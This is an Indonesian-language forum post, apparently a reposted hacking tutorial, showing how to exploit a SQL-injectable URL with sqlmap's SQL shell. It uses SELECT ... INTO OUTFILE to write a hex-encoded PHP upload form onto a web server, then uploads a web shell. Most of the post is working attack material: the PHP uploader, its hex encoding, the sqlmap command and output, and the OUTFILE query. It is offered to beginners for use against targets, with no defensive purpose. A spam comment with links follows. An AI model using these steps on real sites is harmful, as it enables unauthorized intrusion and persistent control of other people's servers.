newbie cuma sekedar pengen sharing biar bisa sama2
tentunya agan2 sekalian udah pada tau dong sama tools yang namanya sqlmap, nih tools ajib buat sqli buat newbie kyk ane
kali ini ane mau share ilmu newbie ane hasil nyontek sana sini, ane mau share cara upload shell pake sqlmap ..
pertama kita musti punya target dulu dong tentunya,
nih contoh target ane
Quote:http://dewa-maho.com/tusuk.php?id=5
trus siapin script upload ente gan, disini sebagai contoh ane mau upload scrip ini nih
PHP Code:
<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>tapi sebelumnya convert dulu script diatas menjadi hex gan sebelum bisa di upload, hasilnya jadi gini nih
PHP Code:
3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d697422
2076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f616465
6466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e open terminal trus open sqlmap nya.. klo belom punya download di mari gan
Quote:http://sqlmap.org/
next:
Quote:python sqlmap.py -u http://dewa-maho.com/tusuk.php?id=5 --sql-shell
trus kluar kira2 beginian nih
Quote:[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>
sekarang ketik SELECT 0x'Hex' INTO OUTFILE "PATH/namaFile";
jangan lupa menambahkan '0x' di depan 'HEX'
Quote:select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974 222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164 656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
into "/home/relax/public_html/upload.php";
tunggu dan jika beruntung akan ada pemberitahuan berhasil di upload, klo apes ya coba lagi
klo berhasil silahkan browse file kita tadi,
Quote:http://dewa-maho.com/upload.php
trus upload shell deh...
sumber : http://devilzc0de.org
6. http://ow.ly/jeHAY
http://bit.ly/11FVLd0
Thanks Infonya Gan Jangan Lupa Visit Back http://www.stevin-germy.my.id
ReplyDelete